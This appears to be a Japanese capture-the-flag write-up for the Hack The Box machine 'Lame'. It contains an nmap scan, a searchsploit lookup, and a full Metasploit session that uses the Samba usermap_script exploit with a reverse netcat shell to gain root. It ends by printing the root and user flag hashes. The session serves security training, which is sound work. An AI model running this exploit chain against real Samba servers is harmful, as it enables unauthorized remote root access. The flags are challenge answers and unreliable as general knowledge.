Sambaが動作していることを確認
# nmap -A -n -F -T5 lame.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 08:55 UTC Nmap scan report for lame.htb (10.10.10.3) Host is up (0.047s latency). Not shown: 96 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.8 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Timing level 5 (Insane) used No OS matches for host Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h05m22s, deviation: 2h49m43s, median: 5m21s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2020-08-02T05:01:18-04:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
Sambaの脆弱性を検索
検索した結果 ‘Username’ map script’ Command Execution (Metasploit)を利用してみることに。
# apt install exploitdb # searchsploit samba 3.0.20 ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
Metasploitの実行
# apt install metasploit-framework
# /etc/init.d/postgresql start
Starting PostgreSQL 12 database server: main.
root@81c581d5cf43:/# update-rc.d postgresql enable
root@81c581d5cf43:/# msfdb init
...
# msfconsole
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v5.0.100-dev ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
msf5 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
1 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
2 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
3 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
4 auxiliary/scanner/rsync/modules_list normal No List Rsync Modules
5 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
6 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
7 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
8 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
9 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
10 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
11 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
12 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
13 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
14 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
15 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
16 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
17 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
18 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
19 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
20 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
21 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
22 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
23 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
24 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
25 post/linux/gather/enum_configs normal No Linux Gather Configurations
Interact with a module by name or index, for example use 25 or use post/linux/gather/enum_configs
msf5 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.17.0.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS lame.htb
RHOSTS => lame.htb
msf5 exploit(multi/samba/usermap_script) > set LHOST
set LHOST
msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf5 exploit(multi/samba/usermap_script) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/samba/usermap_script) > exploit
[-] Handler failed to bind to 10.10.x.x:1234:- -
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Command shell session 1 opened (172.17.0.2:1234 -> 172.17.0.1:60758) at 2020-08-02 12:56:28 +0000
id
uid=0(root) gid=0(root)
cat /root/root.txt
92caac3be140ef409e45721348a4e9df
cd /home
ls
ftp
makis
service
user
cd makis
cat /home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5